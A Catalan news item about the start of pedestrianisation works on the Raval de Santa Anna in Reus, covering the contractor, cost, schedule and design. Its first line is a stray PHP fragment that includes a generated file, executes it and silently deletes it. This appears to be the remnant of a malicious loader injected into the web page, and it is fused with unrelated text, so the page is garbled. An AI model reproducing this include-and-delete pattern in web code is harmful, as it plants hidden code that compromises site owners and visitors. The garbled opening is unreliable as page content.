");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Comencen les obres de transformació del raval de Santa Anna de Reus en zona de vianants
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Comencen les obres de transformació del raval de Santa Anna de Reus en zona de vianants (05/10/2021)

L'Ajuntament de Reus ha iniciat aquest dilluns, 4 d'octubre les obres de transformació en zona de vianants del tram del raval Santa Anna entre la plaça de Prim i el carrer de Santa Anna, adjudicades a l'empresa Izer Ingenieria y Economia, per un import de 374.650,80 euros. El contracte té un termini d'execució de 4 mesos. En paraŀlel, l'Ajuntament avança en la tramitació de la segona fase del projecte, que inclou el tram entre el carrer de Santa Anna i la plaça Catalunya, i carrer Salvador Espriu. El passat mes d'agost, es va adjudicar el contracte per a la redacció del projecte a CIG Enginyeria SLP, per un import de 13.612,50 euros i un termini d'execució de de 4 mesos.

Les obres tenen el calendari previst següent:

- 4 d’octubre, inici de les obres.
- 6 de desembre, previsió que la plataforma central del carrer estigui acabada.
- Del 7 al 20 de desembre, es faran intervencions puntuals que no afectaran al pas de - Del 21 de desembre al 7 de gener, quedaran aturades tot tipus d’obres.
- A partir del 7 de gener es finalitzaran les intervencions que hagin quedat pendents.

El projecte de transformació del raval de Santa Anna en zona de vianants planteja convertir el vial en una illa de vianants de plataforma única; una plaça allargada amb la presència d'elements de mobiliari urbà que fomentin l'ús per a la ciutadania a peu, creïn zones d'estada i que, alhora, siguin vestíbul de les botigues i del patrimoni arquitectònic del carrer, i contribueixen a naturalitzar l'entorn amb l'increment d'espais verds. La idea principal de la intervenció és guanyar un espai per als vianants. El raval de Santa Anna es transformarà en un recorregut cívic que converteixi els actuals llocs de pas en llocs d'estada i de relació de la ciutadania.

Serà una illa de vianants de plataforma única. El projecte manté les voreres i vorades actuals, i proposa un paviment confortable, d'asfalt polit amb àrids de pedra de color rosada per les zones on hi hagin de circular vehicles de manera ocasional. La circulació dels vehicles de residents es resoldrà amb el control d'accés mitjançant lectura de matrícula. També està prevista la redistribució de les zones de càrrega i descarrega afectades.

Un dels principals atractius del futur raval és el mobiliari urbà. Els nous elements es configuren a partir de parklets, elements de fusta amb jardineria i plataforma d'estada -de fàcil instaŀlació i manteniment-, que permeten canviar la imatge del vial i generar nous espais de relació. Es creen així llocs d'estada i de convivència, que es configuren com a vestíbuls dels establiments comercials i patrimonials, i contribueixen a incentivar l'activitat econòmica i a promocionar el patrimoni arquitectònic. Aquests espais d'estada, es dissenyen també amb jardineria, fet que contribueix a naturalitzar l'entorn amb l'increment d'espais verds.

La qualitat ambiental també es millora amb la instaŀlació de làmpades Led de baix consum, més eficients i ecològiques. I es millorarà la iŀluminació, amb l’objectiu d'augmentar el confort i la seguretat.

El projecte de la segona fase definirà la continuïtat de la primera, amb les mateixes característiques: guanyar espai per als vianants i transformar el traçat en un recorregut cívic que converteixi els actuals llocs de pas en llocs d'estada i de relació de la ciutadania. La transformació del carrer de Salvador Espriu en zona de vianants preveurà garantir l’accessibilitat de l’aparcament privat que hi ha en aquest vial. El projecte executiu definirà la descentralització del control d’accés a l’equipament al carrer de l’Amargura per tal de facilitar l’entrada i sortida de clients i limitar l’accés a la resta de vehicles.

Font: Ajuntament de Reus

Comencen les obres de transformació del raval de Santa Anna de Reus en zona de vianants

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona